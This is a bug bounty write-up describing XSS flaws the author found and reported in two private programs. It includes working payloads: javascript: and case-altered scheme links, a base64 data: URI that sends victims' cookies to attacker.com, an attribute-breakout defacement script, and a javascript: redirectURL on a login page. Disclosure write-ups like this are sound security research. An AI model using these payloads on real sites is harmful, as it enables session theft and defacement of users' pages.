Journey To The XSS

Saad Ahmed
4 min readMay 19, 2018

--

Hi, it’s being a long time since I do a write up so this post i s all about the xss I found in two different private programs so let get start

So the 1st program have feature like that

where we can put some html code and try to do XSS but i try with different method and possible all the event handler to get xss but the program in checking all the things properly and removing all the things started from on keyword

So the one thing some in my mind let try the xss on links so the next was
<a href=”javascript:alert(1)”>xD</a>
and boom xss popup this is the area of compose post where we write post and then published it where other users can also saw the post so any one click on the link the xss popup

reported the issue the to program they quick fixed that i was trying to bypass the filteration after and note that the they were checking javascrit: in the href if it’s their then it escaping it so i try different methods like url encode and colon; instead of : but no method worked then i do some googling and find a payload <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWU8L3NjcmlwdD4=”>test</a>

so i used this payload and it worked and i able to steal the user cookie with this also again reported this to the program and they fixed it then i was again checking this and they apply the same fixed as they apply in javascript: one & now they are checking for both data: and javascript: so I was trying to bypass that and didn’t expect that the bypass was to easy I just think that the program was checking this like that

so if we just make any later capital in the payload it worked and try this boom this worked and same try with data: and it worked reported this program and get $500 for all the 4 XSS

so the 2nd program have url like that
https://PRIVATEcom/?url=[URL]
it’s a download link which is render in the webpage

if you click on **Click here if the download doesn’t start in several seconds.** i will go to the url which is in the url parm so I changed it to javascript:alert(1) & used data: payload here and it worked on the 1st attempt :D

the url parm comes in a href=”[URL]” so i try to inject another to get ride over href=” ” and it was properly checking and by mistake enter “</><h1>ss</h1> and boom HTML injected

so after that i try to do something with this and what about a defaced :D
my next payload was

“</><script> document.getElementsByTagName(“body”)[0].innerHTML = “<h1 style=’font-size:113px;’><br>Inside The B0x!!</h1>”;</script>

the payload first grab <body> tag and change it entire HTML to <h1 style=’font-size:113px;’><br>Inside The B0x!!</h1>

and the 2nd xss on that program is in this url
https://PRIVATE.com/account/login?redirectURL=PRIVATE/accoun/edit-profile

if user enter the valid credential it will redirect to the url giving in redirectURL parm so just try the luckiest payload javascript:alert(1) bo0m

https://PRIVATE.com/account/login?redirectURL=javascript:alert(1)

now when user enter his credential the xss popup

hope you guy like it and sorry for bad english :P

./Logout ;)

--

--

No responses yet